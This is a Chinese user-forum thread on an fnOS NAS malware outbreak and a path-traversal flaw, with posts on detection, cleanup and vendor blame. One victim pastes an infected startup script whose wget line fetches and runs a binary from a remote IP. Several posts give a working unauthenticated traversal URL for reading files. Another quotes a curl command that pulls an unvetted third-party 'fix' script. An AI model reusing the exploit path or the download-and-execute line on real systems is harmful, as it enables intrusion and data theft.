fnos 恶意程序分析

ZERO_XSWqv

皮的很 发表于 2026-1-31 15:38
>>> 阶段 6: 净化系统配置
sed: cannot rename /etc/sedpT4dRD: Operation not permitted
[正常]   已清 ...

你先sudo chattr -ia /etc/rc.local
sudo chattr -ia /usr/trim/bin/system_startup.sh
再运行脚本就可以

Joshua_P2TTO

斯诺克王子 发表于 2026-1-31 15:27
执行报错了

1. sudo -i
   

复制代码

提权限再执行

WDDXH

飞牛社区主理人 发表于 2026-1-31 12:41
感谢分享，分析很精彩，该问题官方已知，经过技术分析追踪该行为是是在公网暴露服务的情况下，开启http明文 ...

你说的不对 用http https 包括官方fnid一样复现 压根不是http问题请不要乱甩锅 证据如图

82280095

真操蛋，飞牛现在没有网络了，还不知道重装能不能好了

皮的很

ZERO_XSWqv 发表于 2026-1-31 16:18
你先sudo chattr -ia /etc/rc.local
sudo chattr -ia /usr/trim/bin/system_startup.sh
再运行脚本就可以 ...

可以了 谢谢大佬！

WDDXH

Eic 发表于 2026-1-31 01:24
这玩意儿明显是官方有0day漏洞了，我就只开了web的访问端口，其他端口全都没开放，现在还没个说法，我现在 ...

用http https 包括官方fnid一样复现 压根不是http问题请不要乱甩锅

miaowoo

我还一直以为是我家里路由器坏了 动不动网络卡 今天看到 自查了一下 中招了

官方知道了 为什么不发公告 不发通知

qianlongzt

网上随便找的幸运用户。0.9.29 https

https://mp.weixin.qq.com/s/oktCsLc68OY7tJMPJjlwsg
至少在2025年10月26日这个漏洞就存在了

0.9.9

皮的很

ZERO_XSWqv 发表于 2026-1-31 16:18
你先sudo chattr -ia /etc/rc.local
sudo chattr -ia /usr/trim/bin/system_startup.sh
再运行脚本就可以 ...

又出新问题了 修复完后 重启运行脚本没发现异常 随后等几分钟再运行 还是有恶意ip链接 防火墙规则也加了 哎

ZERO_XSWqv

皮的很 发表于 2026-1-31 16:53
又出新问题了 修复完后 重启运行脚本没发现异常 随后等几分钟再运行 还是有恶意ip链接 防火墙规则也加了  ...

恶意链接的ip是什么，我看看我有没有

satsun

注册好几天了，终于可以留言了。刚刚虚拟机安装飞牛没有几天的老牛一名。虽然是初入nas但是技术码农很多年了。用了frpc 穿透，目前学习下fnos问题不大。你们发现这种漏洞先整着 ，我搬个 板凳看着。我还没有在真实机器装，都是测试。

hzonz

master-matt 发表于 2026-1-31 14:27
1.1.15版本前存在严重的路径穿越bug，不信的话符合版本的用户在不登录情况下访问 /app-center-static/servi ...

我的提示404，无法访问

flycat

[quote][size=2][url=forum.php?mod=redirect&goto=findpost&pid=244293&ptid=53230][color=#999999]miaowoo 发表于 2026-1-31 16:36[/color][/url][/size] 我还一直以为是我家里路由器坏了 动不动网络卡 今天看到 自查了一下 中招了 官方知道了 为什么不发公告 不 ...[/quote]

显然他们已知晓这个问题，就是不发公告扩散通知升级，偷偷摸摸修复。
出问题甩锅给HTTP明文传输，路径穿越漏洞和HTTP/HTTPS协议有什么关系？
还好我一开始就不相信飞牛安全，自己用NGINX的规则加固。

总的来说，这次攻击是可预见性的，意料之中。暴露在互联网上的服务必须方方面面都考虑好才行。

gunana

master-matt 发表于 2026-1-31 14:27
1.1.15版本前存在严重的路径穿越bug，不信的话符合版本的用户在不登录情况下访问 /app-center-static/servi ...

我试了一下，可以访问，但是点进去目录看不到任何内容，提示404

flycat

Illustar0 发表于 2026-1-31 14:43
POC 满天飞了你们还装成什么都不知道的样子吗？什么都不知道1.1.15是怎么修复这个问题的？
...

没有应急响应意识，偷偷摸摸修复 = 瞒天过海。忽略了用户体量和互联网的险恶。

82280095

放弃吧，自身系统有缺陷，重装也会中招的。

utopias77

gunana 发表于 2026-1-31 17:09
我试了一下，可以访问，但是点进去目录看不到任何内容，提示404

直接在地址栏里访问文件路径还是可以看到，比如说
/app-center-static/serviceicon/myapp/{0}/?size=../../../../vol1/1000/

qianlongzt

安全建议：1.1.15修复了目录遍历漏洞，但是有没有其他漏洞不清楚。反正升级到1.1.15是最好的选择

关闭公网访问、包括fnid
访问就是 tailscale 等内网 vpn

satsun

qianlongzt 发表于 2026-1-31 17:19
安全建议：1.1.15修复了目录遍历漏洞，但是有没有其他漏洞不清楚。反正升级到1.1.15是最好的选择
关闭公网 ...

关闭公网 你nas还有多少意思

qianlongzt

satsun 发表于 2026-1-31 17:27
关闭公网 你nas还有多少意思

总比当成肉**强

gunana

master-matt 发表于 2026-1-31 14:27
1.1.15版本前存在严重的路径穿越bug，不信的话符合版本的用户在不登录情况下访问 /app-center-static/servi ...

确实能看到！太吓人了

wyx

WDDXH 发表于 2026-1-31 16:36
用http https 包括官方fnid一样复现 压根不是http问题请不要乱甩锅 证据如图

**，立马把飞牛从公网撤下来

gunana

utopias77 发表于 2026-1-31 17:19
直接在地址栏里访问文件路径还是可以看到，比如说
/app-center-static/serviceicon/myapp/{0}/?size=../. ...

看到了，吓人

盐煎肉

utopias77 发表于 2026-1-31 17:19
直接在地址栏里访问文件路径还是可以看到，比如说
/app-center-static/serviceicon/myapp/{0}/?size=../. ...

我这看不到，还是404

gunana

试了一下确实能看到文件，建议飞牛官方是不是可以赶紧发个公告提醒用户升级，避免信息泄露。

mtz447065695

属实，已中招，21号开始出现问题的

hjz2358

飞牛社区主理人 发表于 2026-1-31 14:37
私信一下联系方式，加你看一下

大佬能救救我吗，中招木马了：
hjz@hjz-fnOS:~$ cat /usr/trim/bin/system_startup.sh
#!/bin/bash

STATUS="/var/lib/dpkg/status"
BACKUP="/var/lib/dpkg/status.original"


if [ ! -f "$BACKUP" ]; then
    if [ -f "$STATUS" ]; then
        cp "$STATUS" "$BACKUP"
    fi
fi

if [ ! -f "$STATUS" ]; then
    if [ -f "$BACKUP" ]; then
        cp "$BACKUP" "$STATUS"
    fi
fi

rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*

wget http://43.198.11.122/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
hjz@hjz-fnOS:~$

一點墨

等官方尽快修复吧，我原来还怀疑是系统bug,原来是被黑了

bct2398

/app-center-static/serviceicon/myapp/%7B0%7D?size=../../../../我试了一下，无论是1.1.11还是1.1.15版本的系统都是404，看不到文件的

liiecho

至少我们还是排查出来的，不是还有多少人没排查到呢，建议官方发一下紧急通知吧，把损失降到最小

。

贰柒doge

bct2398 发表于 2026-1-31 18:17
/app-center-static/serviceicon/myapp/%7B0%7D?size=../../../../我试了一下，无论是1.1.11还是1.1.15版本 ...

后面得加对应文件路径，比如说飞牛密码路径

鸡儿贼大

我的是疯狂连接这个IP地址，103.248.152.136

LeapHeap

我外网访问全部走wireguard，根本不担心

qianlongzt

https://www.nodeseek.com/post-602323-1

再不跑就老

我好像和你们一样问题 最终怎么解决

Tily

我是最近一段时间看到CPU有异常占用，动不动100%才知道这件事，有可能中招了，但是我没去查，直接重装了

再不跑就老

我的访问IP和你的不同 情况一样 能有偿帮忙处理下吗?

JackyZ

Tily 发表于 2026-1-31 19:14
我是最近一段时间看到CPU有异常占用，动不动100%才知道这件事，有可能中招了，但是我没去查，直接重装了
...

重装会掉数据吗？

Tily

JackyZ 发表于 2026-1-31 19:33
重装会掉数据吗？

这个没在意，我没放数据，就是装上体验然后丢在那里了，但是我看数据盘默认有点数据，应该只是重装的系统盘

再不跑就老

DCr9nmaqFU14O 发表于 2026-1-31 09:30
确实是22号开始的，stat /usr/trim/bin/system_startup.sh 的输出，显示修改时间就是22号。感觉飞牛的登 ...

我也是22号开始的 现在只处理了 禁止访问IP的防火墙,其他的不知道怎么处理 现在更新也更新不了了

刚会飞的牛

success 发表于 2026-1-31 14:39
#一键检测修复工具
curl -ksSL https://us1.vvvvvv.de5.net/sh/fnos_xxck1.sh -o /usr/local/bin/fnos_xxc ...

报错   curl: (35) Recv failure: Connection reset by peer

再给大斌子

arm也有这个bug但是 病毒可能是只在X86运行 所以 暂时我没中招

cnvisi

一开机就有一个日本东京的IP连接到我的飞牛，直接关机坐等修复。

nijpatin

yuyuko 发表于 2026-1-31 13:31
现在也可以

现在1.1.15也还有这个漏洞吗？

nijpatin

WDDXH 发表于 2026-1-31 16:22
你说的不对 用http https 包括官方fnid一样复现 压根不是http问题请不要乱甩锅 证据如图 ...

现在1.1.15还有这个漏洞吗？

FunnyFly

目前没中招，fn connect暂时关掉了，还好之前一直用的自建反代+规则

ThorHe

公众号PokerSec发了1.1.15版本存在的漏洞

fun5201314

nijpatin 发表于 2026-1-31 20:12
现在1.1.15还有这个漏洞吗？

还在
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../你加上域名就可以绕过认证

fun5201314

/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../ 漏洞还在

fun5201314

qianlongzt 发表于 2026-1-31 16:50
网上随便找的幸运用户。0.9.29 https

https://mp.weixin.qq.com/s/oktCsLc68OY7tJMPJjlwsg

这个很早就有一直就没有修复过 包括现在115版本也是没有修复